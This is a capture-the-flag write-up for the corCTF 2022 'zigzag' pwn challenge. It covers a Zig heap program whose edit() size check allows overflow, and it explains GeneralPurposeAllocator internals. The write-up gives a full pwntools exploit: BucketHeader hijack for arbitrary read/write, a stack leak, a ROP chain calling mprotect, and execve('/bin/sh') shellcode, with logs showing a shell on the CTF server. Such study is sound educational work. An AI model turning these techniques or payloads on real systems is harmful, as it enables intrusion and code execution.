[corCTF 2022 - pwn] zigzag
Introduction
zigzag
is a zig heap challenge I did during the corCTF 2022 event. It was pretty exotic given we have to pwn a heap-like challenge written in zig. It is not using the C allocator but instead it uses the GeneralPurposeAllocator, which makes the challenge even more interesting. Find the tasks here.
TL; DR
- Understanding zig
GeneralPurposeAllocator
internals - Hijack the
BucketHeader
of a given bucket to get a write-what-where / read-what-where primitive. - Leak stack + ROP on the fileRead function (mprotect + shellcode)
- PROFIT
Source code analysis
The source code is provided:
// zig build-exe main.zig -O ReleaseSmall
// built with zig version: 0.10.0-dev.2959+6f55b294f
const std = @import("std");
const fmt = std.fmt;
const stdout = std.io.getStdOut().writer();
const stdin = std.io.getStdIn();
// Upper bound (exclusive) on a single allocation request, checked in add().
const MAX_SIZE: usize = 0x500;
// In-band sentinel returned by readNum() when parsing fails.
const ERR: usize = 0xbaad0000;
// Sentinel pointer value marking an unused chunklist slot.
const NULL: usize = 0xdead0000;
// Global table of user-controlled slices (fat pointers: ptr + len).
var chunklist: [20][]u8 = undefined;
var gpa = std.heap.GeneralPurposeAllocator(.{}){};
const allocator = gpa.allocator();
// Print the interactive menu and the "> " prompt to stdout.
pub fn menu() !void {
    try stdout.print("[1] Add\n", .{});
    try stdout.print("[2] Delete\n", .{});
    try stdout.print("[3] Show\n", .{});
    try stdout.print("[4] Edit\n", .{});
    try stdout.print("[5] Exit\n", .{});
    try stdout.print("> ", .{});
}
// Read up to 64 bytes from stdin, strip trailing newlines, and parse the
// input as a base-10 unsigned integer. Parse failures are reported in-band
// by returning the ERR sentinel (0xbaad0000) rather than a Zig error.
pub fn readNum() !usize {
    var buf: [64]u8 = undefined;
    var stripped: []const u8 = undefined;
    var amnt: usize = undefined;
    var num: usize = undefined;
    amnt = try stdin.read(&buf);
    stripped = std.mem.trimRight(u8, buf[0..amnt], "\n");
    num = fmt.parseUnsigned(usize, stripped, 10) catch {
        // Unparsable input maps to the sentinel that every caller checks.
        return ERR;
    };
    return num;
}
// Menu action [1]: allocate a new chunk.
// Reads an index and a size, validates both, allocates `size` bytes via the
// GeneralPurposeAllocator, and fills the new chunk with user data.
pub fn add() !void {
    var idx: usize = undefined;
    var size: usize = undefined;
    try stdout.print("Index: ", .{});
    idx = try readNum();
    // Reject parse failures, out-of-range indexes, and already-used slots
    // (an unused slot holds the NULL sentinel pointer).
    if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) != NULL) {
        try stdout.print("Invalid index!\n", .{});
        return;
    }
    try stdout.print("Size: ", .{});
    size = try readNum();
    // Unlike edit(), this size check is sound: size must be below MAX_SIZE.
    if (size == ERR or size >= MAX_SIZE) {
        try stdout.print("Invalid size!\n", .{});
        return;
    }
    chunklist[idx] = try allocator.alloc(u8, size);
    try stdout.print("Data: ", .{});
    // Read at most `size` bytes into the freshly allocated slice.
    _ = try stdin.read(chunklist[idx]);
}
// Menu action [2]: free a chunk.
// Frees the slice, then resets the slot to the NULL sentinel with len 0,
// which prevents double frees / use-after-free through this menu.
pub fn delete() !void {
    var idx: usize = undefined;
    try stdout.print("Index: ", .{});
    idx = try readNum();
    if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) == NULL) {
        try stdout.print("Invalid index!\n", .{});
        return;
    }
    _ = allocator.free(chunklist[idx]);
    // Mark the slot unused again.
    chunklist[idx].ptr = @intToPtr([*]u8, NULL);
    chunklist[idx].len = 0;
}
// Menu action [3]: print a chunk's contents.
// Prints chunklist[idx].len bytes starting at the chunk pointer, so a
// corrupted ptr/len pair turns this into an arbitrary read.
pub fn show() !void {
    var idx: usize = undefined;
    try stdout.print("Index: ", .{});
    idx = try readNum();
    if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) == NULL) {
        try stdout.print("Invalid index!\n", .{});
        return;
    }
    try stdout.print("{s}\n", .{chunklist[idx]});
}
// Menu action [4]: overwrite a chunk's contents.
//
// VULNERABILITY: the size check is broken. The condition
// `size > chunklist[idx].len and size == ERR` only rejects when BOTH parts
// hold, so any user-chosen size != ERR is accepted no matter how large.
// `len` is then blindly enlarged and stdin.read() writes past the allocated
// object -> heap buffer overflow (this is the bug the writeup exploits).
pub fn edit() !void {
    var idx: usize = undefined;
    var size: usize = undefined;
    try stdout.print("Index: ", .{});
    idx = try readNum();
    if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) == NULL) {
        try stdout.print("Invalid index!\n", .{});
        return;
    }
    try stdout.print("Size: ", .{});
    size = try readNum();
    if (size > chunklist[idx].len and size == ERR) {
        try stdout.print("Invalid size!\n", .{});
        return;
    }
    // len is updated to the (possibly oversized) user-supplied value.
    chunklist[idx].len = size;
    try stdout.print("Data: ", .{});
    _ = try stdin.read(chunklist[idx]);
}
// Entry point: initialize every chunklist slot to the NULL sentinel, then
// loop on the menu dispatching to add/delete/show/edit until "5" (exit).
pub fn main() !void {
    var choice: usize = undefined;
    for (chunklist) |_, i| {
        chunklist[i].ptr = @intToPtr([*]u8, NULL);
        chunklist[i].len = 0;
    }
    while (true) {
        try menu();
        choice = try readNum();
        // Unparsable input (ERR) just re-displays the menu.
        if (choice == ERR) continue;
        if (choice == 1) try add();
        if (choice == 2) try delete();
        if (choice == 3) try show();
        if (choice == 4) try edit();
        if (choice == 5) break;
    }
}
The source code is quite readable, the vulnerability is the overflow within the edit
function. The check onto the provided size isn’t efficient, size > chunklist[idx].len and size == ERR
, if size > chunklist[idx].len
and if size != ERR
the condition is false. Which means we can edit the chunk by writing an arbitrary amount of data in it.
GeneralPurposeAllocator abstract
The zig source is quite readable so let’s take a look at the internals of the GeneralPurposeAllocator allocator. The GeneralPurposeAllocator is implemented here. The header of the source code file gives the basic design of the allocator:
//! ## Basic Design:
//!
//! Small allocations are divided into buckets:
//!
//! ```
//! index obj_size
//! 0 1
//! 1 2
//! 2 4
//! 3 8
//! 4 16
//! 5 32
//! 6 64
//! 7 128
//! 8 256
//! 9 512
//! 10 1024
//! 11 2048
//! ```
//!
//! The main allocator state has an array of all the "current" buckets for each
//! size class. Each slot in the array can be null, meaning the bucket for that
//! size class is not allocated. When the first object is allocated for a given
//! size class, it allocates 1 page of memory from the OS. This page is
//! divided into "slots" - one per allocated object. Along with the page of memory
//! for object slots, as many pages as necessary are allocated to store the
//! BucketHeader, followed by "used bits", and two stack traces for each slot
//! (allocation trace and free trace).
//!
//! The "used bits" are 1 bit per slot representing whether the slot is used.
//! Allocations use the data to iterate to find a free slot. Frees assert that the
//! corresponding bit is 1 and set it to 0.
//!
//! Buckets have prev and next pointers. When there is only one bucket for a given
//! size class, both prev and next point to itself. When all slots of a bucket are
//! used, a new bucket is allocated, and enters the doubly linked list. The main
//! allocator state tracks the "current" bucket for each size class. Leak detection
//! currently only checks the current bucket.
//!
//! Resizing detects if the size class is unchanged or smaller, in which case the same
//! pointer is returned unmodified. If a larger size class is required,
//! `error.OutOfMemory` is returned.
//!
//! Large objects are allocated directly using the backing allocator and their metadata is stored
//! in a `std.HashMap` using the backing allocator.
Let’s take a look at alloc
function:
// GPA allocation entry point (zig 0.10.0-dev stdlib excerpt).
// Requests larger than the biggest bucket class go straight to the backing
// allocator with metadata tracked in `large_allocations`; smaller requests
// are rounded up to a power-of-two size class and served from a bucket slot.
fn alloc(self: *Self, len: usize, ptr_align: u29, len_align: u29, ret_addr: usize) Error![]u8 {
    self.mutex.lock();
    defer self.mutex.unlock();
    if (!self.isAllocationAllowed(len)) {
        return error.OutOfMemory;
    }
    const new_aligned_size = math.max(len, ptr_align);
    // Large path: no BucketHeader involved; metadata lives in a hash map.
    if (new_aligned_size > largest_bucket_object_size) {
        try self.large_allocations.ensureUnusedCapacity(self.backing_allocator, 1);
        const slice = try self.backing_allocator.rawAlloc(len, ptr_align, len_align, ret_addr);
        const gop = self.large_allocations.getOrPutAssumeCapacity(@ptrToInt(slice.ptr));
        if (config.retain_metadata and !config.never_unmap) {
            // Backing allocator may be reusing memory that we're retaining metadata for
            assert(!gop.found_existing or gop.value_ptr.freed);
        } else {
            assert(!gop.found_existing); // This would mean the kernel double-mapped pages.
        }
        gop.value_ptr.bytes = slice;
        if (config.enable_memory_limit)
            gop.value_ptr.requested_size = len;
        gop.value_ptr.captureStackTrace(ret_addr, .alloc);
        if (config.retain_metadata) {
            gop.value_ptr.freed = false;
            if (config.never_unmap) {
                gop.value_ptr.ptr_align = ptr_align;
            }
        }
        if (config.verbose_log) {
            log.info("large alloc {d} bytes at {*}", .{ slice.len, slice.ptr });
        }
        return slice;
    }
    // Small path: round up to the next power of two and grab a bucket slot.
    const new_size_class = math.ceilPowerOfTwoAssert(usize, new_aligned_size);
    const ptr = try self.allocSlot(new_size_class, ret_addr);
    if (config.verbose_log) {
        log.info("small alloc {d} bytes at {*}", .{ len, ptr });
    }
    return ptr[0..len];
}
First in alloc
, if the aligned size is not larger than the largest bucket capacity (2**11) it will call allocSlot
.
// Find (or create) a bucket for `size_class` with a free slot, mark that
// slot used, and return the slot's address inside the bucket's object page.
fn allocSlot(self: *Self, size_class: usize, trace_addr: usize) Error![*]u8 {
    const bucket_index = math.log2(size_class);
    const first_bucket = self.buckets[bucket_index] orelse try self.createBucket(
        size_class,
        bucket_index,
    );
    var bucket = first_bucket;
    const slot_count = @divExact(page_size, size_class);
    // Walk the circular doubly linked list until a bucket with room is found.
    while (bucket.alloc_cursor == slot_count) {
        const prev_bucket = bucket;
        bucket = prev_bucket.next;
        if (bucket == first_bucket) {
            // make a new one
            bucket = try self.createBucket(size_class, bucket_index);
            bucket.prev = prev_bucket;
            bucket.next = prev_bucket.next;
            prev_bucket.next = bucket;
            bucket.next.prev = bucket;
        }
    }
    // change the allocator's current bucket to be this one
    self.buckets[bucket_index] = bucket;
    const slot_index = bucket.alloc_cursor;
    bucket.alloc_cursor += 1;
    var used_bits_byte = bucket.usedBits(slot_index / 8);
    const used_bit_index: u3 = @intCast(u3, slot_index % 8); // TODO cast should be unnecessary
    used_bits_byte.* |= (@as(u8, 1) << used_bit_index);
    bucket.used_count += 1;
    bucket.captureStackTrace(trace_addr, size_class, slot_index, .alloc);
    // NOTE(review): the returned address is computed purely from .page and
    // .alloc_cursor — which is why corrupting the BucketHeader's .page field
    // yields a chunk at an attacker-chosen location.
    return bucket.page + slot_index * size_class;
}
allocSlot
will check if the current bucket is able to allocate one more object, else it will iterate through the doubly linked list to look for a not full bucket.
And if it does not find one, it creates a new bucket. When the bucket is allocated, it returns the available object at bucket.page + slot_index * size_class
.
As you can see, the BucketHeader
is structured like below in the createBucket
function:
// Allocate one page for the objects plus a separate allocation for the
// BucketHeader (followed by used bits / stack traces), link the fresh header
// to itself, and install it as the current bucket for this size class.
fn createBucket(self: *Self, size_class: usize, bucket_index: usize) Error!*BucketHeader {
    const page = try self.backing_allocator.allocAdvanced(u8, page_size, page_size, .exact);
    errdefer self.backing_allocator.free(page);
    const bucket_size = bucketSize(size_class);
    const bucket_bytes = try self.backing_allocator.allocAdvanced(u8, @alignOf(BucketHeader), bucket_size, .exact);
    const ptr = @ptrCast(*BucketHeader, bucket_bytes.ptr);
    // A brand-new bucket is its own prev/next (singleton circular list).
    ptr.* = BucketHeader{
        .prev = ptr,
        .next = ptr,
        .page = page.ptr,
        .alloc_cursor = 0,
        .used_count = 0,
    };
    self.buckets[bucket_index] = ptr;
    // Set the used bits to all zeroes
    @memset(@as(*[1]u8, ptr.usedBits(0)), 0, usedBitsCount(size_class));
    return ptr;
}
It allocates a page to store objects in, then it allocates the BucketHeader
itself. Note that the page allocator will make allocations adjacent to each other. According to my experiments the allocations grow – from an initial given mapping – toward lower or higher addresses. I advise you to try different orders of allocations in gdb to figure this out.
Let’s quickly describe each field of the BucketHeader
:
.prev
and.next
keep track of the doubly linked list that links buckets of same size..page
contains the base address of the page that contains the objects that belong to the bucket.alloc_cursor
contains the number of allocated objects.used_count
contains the number of currently used objects.
Getting a read / write-what-where primitive
Well, the goal is to get an arbitrary read / write by hijacking the .page
and .alloc_cursor
fields of the BucketHeader
, this way if we hijack pointers from a currently used bucket for a given size we can get a chunk toward any location.
What we can do to get a chunk close to a BucketHeader
structure would be:
- Allocate large (
0x500-1
) chunk,0x800
bucket. - Allocate 4 other chunks of size
1000
, which end up in the0x400
bucket.
Thus, first one page has been allocated to satisfy request one, then another page right after the other has been allocated to store the BucketHeader
for this bucket.
Then, to satisfy the four next allocations, the page that stores the objects has been allocated right after the one which stores the BucketHeader
of the 0x800
-bucket, and finally a page is allocated to store the BucketHeader
of the 0x400
bucket.
If you do not understand clearly, I advise you to debug my exploit in gdb
by looking at the chunklist
.
With this process the last allocated 0x400
-sized chunk gets allocated 0x400
bytes before the BucketHeader
of the bucket that handles 0x400
-sized chunks.
Thus, to get a read / write-what-where we can simply trigger the heap overflow with the edit
function to null out .alloc_cursor
and .used_count
and replace .page
by the target location.
This way the next allocation that will request 0x400
bytes, which will trigger the hijacked bucket and return the target location, giving us the primitive.
Which gives:
alloc(0, 0x500-1, b"A")
for i in range(1, 5):
alloc(i, 1000, b"vv")
edit(4, 0x400 + 5*8, b"X"*0x400           # padding
     + pwn.p64(0x208000)*3                # next / prev + .page point toward the target => 0x208000
     + pwn.p64(0x0)                       # .alloc_cursor & .used_count
     + pwn.p64(0))                        # used bits
# next alloc(1000) will trigger the write-what-where
Leak stack
To leak the stack I leaked the argv
variable that contains a pointer toward the arguments given to the program, stored on the stack. That’s a reliable leak given it’s a known and fixed location, which can be used as a base to compute the addresses of functions’ stackframes.
alloc(5, 1000, b"A") # get chunk into target location (0x208000)
show(5)
io.recv(0x100) # argv is located at 0x208000 + 0x100
stack = pwn.u64(io.recv(8))
pwn.log.info(f"stack: {hex(stack)}")
ROP
Now we’re able to overwrite whatever function’s stackframe, we have to find one that returns from context of std.fs.file.File.read
that reads the user input to the chunk. But unlucky functions like add
, edit
are inlined in the main
function. Moreover we cannot overwrite the return address of the main
function given that the exit handler directly calls exit. Which means we have to corrupt the stackframe of the std.fs.file.File.read
function called in the edit
function.
But the issue is that between the call to SYS_read
within std.fs.file.File.read
and the end of the function, variables that belong to the calling function’s stackframe are edited, corrupting the ROPchain. So what I did is using this gadget to reach a part of the stack that will not be corrupted:
0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret
With the use of this gadget I’m able to pop a few QWORD from the stack to reach another area of the stack where I write my ROPchain.
The goal for the ROPchain is to mprotect
a shellcode and then jump on it. The issue is that I didn’t find a gadget to control the value of the rdx
register but when it returns from std.fs.file.File.read
it contains the value of size given to edit
. So to call mprotect(rdi=0x208000, rsi=0x1000, rdx=0x7)
we have to call edit
with a size of 7
to write on the std.fs.file.File.read
saved RIP the value of the magic gadget seen previously.
Here is the ROPchain:
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(0x208000)*3 + pwn.p64(0x000) + pwn.p64(0))
# with the use of the write-what-where we write the shellcode at 0x208000
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
# execve("/bin/sh", NULL, NULL)
alloc(14, 1000, shellcode)
"""
0x0000000000201fcf : pop rax ; syscall
0x0000000000203147 : pop rdi ; ret
0x000000000020351b : pop rsi ; ret
0x00000000002035cf : xor edx, edx ; mov rsi, qword ptr [r9] ; xor eax, eax ; syscall
0x0000000000201e09 : ret
0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret
"""
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0x50)* 3 + pwn.p64(0) + pwn.p64(0))
# write ROPchain into the safe area on the stack
alloc(11, 0x400, pwn.p64(0x203147)        # pop rdi ; ret
     + pwn.p64(0x208000)                  # target area for the shellcode
     + pwn.p64(0x20351b)                  # pop rsi ; ret
     + pwn.p64(0x1000)                    # length
     + pwn.p64(0x201fcf)                  # pop rax ; syscall
     + pwn.p64(0xa)                       # SYS_mprotect
     + pwn.p64(0x208000))                 # jump on the shellcode + PROFIT
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0xd0)* 3 + pwn.p64(0) + pwn.p64(0))
alloc(12, 1000, pwn.p64(0x202d16)) # valid return address
edit(12, 0x7, pwn.p64(0x0000000000203715)) # magic gadget
io.interactive()
PROFIT
nasm@off:~/Documents/pwn/corCTF/zieg$ python3 remote.py REMOTE HOST=be.ax PORT=31278
[*] '/home/nasm/Documents/pwn/corCTF/zieg/zigzag'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x200000)
[+] Opening connection to be.ax on port 31278: Done
[*] stack: 0x7ffc2ca48ae8
[*] Loaded 37 cached gadgets for 'zigzag'
[*] Using sigreturn for 'SYS_execve'
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
flag.txt
zigzag
$ cat flag.txt
corctf{bl4Z1nGlY_f4sT!!}
Appendices
Final exploit:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this exploit was generated via
# 1) pwntools
# 2) ctfmate
import os
import time
import pwn
# Set up pwntools for the correct architecture
# Loading the ELF also sets pwn.context (arch/bits/endianness) from its headers.
exe = pwn.context.binary = pwn.ELF('zigzag')
# pwn.context.terminal = ['tmux', 'new-window']
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
# Target selection via pwntools magic args, e.g. `python3 exploit.py HOST=be.ax PORT=31278`.
host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)
def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    # NOTE(review): mutable default argv=[] is shared across calls; harmless
    # here since it is never mutated, but worth confirming if callers change.
    if pwn.args.GDB:
        # Launch under gdb using the module-level `gdbscript`.
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        # Attach gdb when the GDB magic arg is set.
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io
def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    # Dispatch to a local process or a remote connection based on the LOCAL arg.
    launcher = local if pwn.args.LOCAL else remote
    return launcher(argv, *a, **kw)
# gdb commands sourced when debugging locally with the GDB magic arg.
gdbscript = '''
source ~/Downloads/pwndbg/gdbinit.py
'''.format(**locals())
io = None
# Open the tube (local process or remote socket) used by all helpers below.
io = start()
def alloc(idx, size, data):
    '''Menu [1] Add: allocate chunk `idx` of `size` bytes and send `data`.'''
    exchanges = (
        (b"> ", b"1"),
        (b"Index: ", str(idx).encode()),
        (b"Size: ", str(size).encode()),
        (b"Data: ", data),
    )
    for prompt, payload in exchanges:
        io.sendlineafter(prompt, payload)
def delete(idx):
    '''Menu [2] Delete: free chunk `idx`.'''
    for prompt, payload in ((b"> ", b"2"), (b"Index: ", str(idx).encode())):
        io.sendlineafter(prompt, payload)
def show(idx):
    '''Menu [3] Show: have the target print chunk `idx`.'''
    for prompt, payload in ((b"> ", b"3"), (b"Index: ", str(idx).encode())):
        io.sendlineafter(prompt, payload)
def edit(idx, size, data):
    '''Menu [4] Edit: set chunk `idx` length to `size` (overflow!) and send `data`.'''
    exchanges = (
        (b"> ", b"4"),
        (b"Index: ", str(idx).encode()),
        (b"Size: ", str(size).encode()),
        (b"Data: ", data),
    )
    for prompt, payload in exchanges:
        io.sendlineafter(prompt, payload)
# --- Stage 1: heap grooming --------------------------------------------------
# One large request (0x4ff -> 0x800 size class), then four 1000-byte requests
# (0x400 size class): the last 0x400-class chunk ends up 0x400 bytes before
# that bucket's BucketHeader.
alloc(0, 0x500-1, b"A")
for i in range(1, 5):
    alloc(i, 1000, b"vv")
# --- Stage 2: hijack the 0x400 BucketHeader ----------------------------------
# Overflow out of chunk 4: prev/next/.page -> 0x208000 (no PIE, base 0x200000),
# then zero alloc_cursor/used_count and the used bits.
edit(4, 0x400 + 5*8, b"X"*0x400 + pwn.p64(0x208000)*3 + pwn.p64(0x000) + pwn.p64(0))
# The next 0x400-class allocation is served from the fake "page" at 0x208000.
alloc(5, 1000, b"A")
# --- Stage 3: leak a stack address -------------------------------------------
# The argv pointer lives at 0x208000 + 0x100: dump the chunk, skip 0x100 bytes,
# read the leaked QWORD.
show(5)
io.recv(0x100)
stack = pwn.u64(io.recv(8))
pwn.log.info(f"stack: {hex(stack)}")
# --- Stage 4: plant the shellcode at 0x208000 --------------------------------
# Re-point the bucket at 0x208000 and allocate to write the shellcode there.
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(0x208000)*3 + pwn.p64(0x000) + pwn.p64(0))
# execve("/bin/sh", NULL, NULL) shellcode.
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
alloc(14, 1000, shellcode)
"""
0x0000000000201fcf : pop rax ; syscall
0x0000000000203147 : pop rdi ; ret
0x000000000020351b : pop rsi ; ret
0x00000000002035cf : xor edx, edx ; mov rsi, qword ptr [r9] ; xor eax, eax ; syscall
0x0000000000201e09 : ret
0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret
"""
rop = pwn.ROP(exe)
binsh = 0x208000+(48)
rop.execve(binsh, 0, 0)
# --- Stage 5: write the ROP chain into a quiet stack area (stack-0x50) -------
# Chain: pop rdi; 0x208000 | pop rsi; 0x1000 | pop rax; syscall; 0xa (mprotect)
# | 0x208000 (jump to shellcode). rdx is set later via edit()'s size.
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0x50)* 3 + pwn.p64(0) + pwn.p64(0))
alloc(11, 0x400, pwn.p64(0x203147) + pwn.p64(0x208000) + pwn.p64(0x20351b) + pwn.p64(0x1000) + pwn.p64(0x201fcf) + pwn.p64(0xa) + pwn.p64(0x208000))
# --- Stage 6: pivot ----------------------------------------------------------
# Point the bucket at File.read's stackframe (stack-0xd0), drop a valid return
# address, then edit() with size 7 (so rdx=7=PROT_RWX when read returns) to
# replace the saved RIP with the `add rsp, 0x68 ; pop rbx ; pop r14 ; ret`
# gadget, which lands execution on the chain written above.
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0xd0)* 3 + pwn.p64(0) + pwn.p64(0))
alloc(12, 1000,pwn.p64(0x202d16))
edit(12, 0x7, pwn.p64(0x0000000000203715))
io.interactive()
"""
nasm@off:~/Documents/pwn/corCTF/zieg$ python3 remote.py REMOTE HOST=be.ax PORT=31278
[*] '/home/nasm/Documents/pwn/corCTF/zieg/zigzag'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x200000)
[+] Opening connection to be.ax on port 31278: Done
[*] stack: 0x7ffe21d2cc68
[*] Loaded 37 cached gadgets for 'zigzag'
[*] Using sigreturn for 'SYS_execve'
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ cat flag.txt
corctf{bl4Z1nGlY_f4sT!!}
"""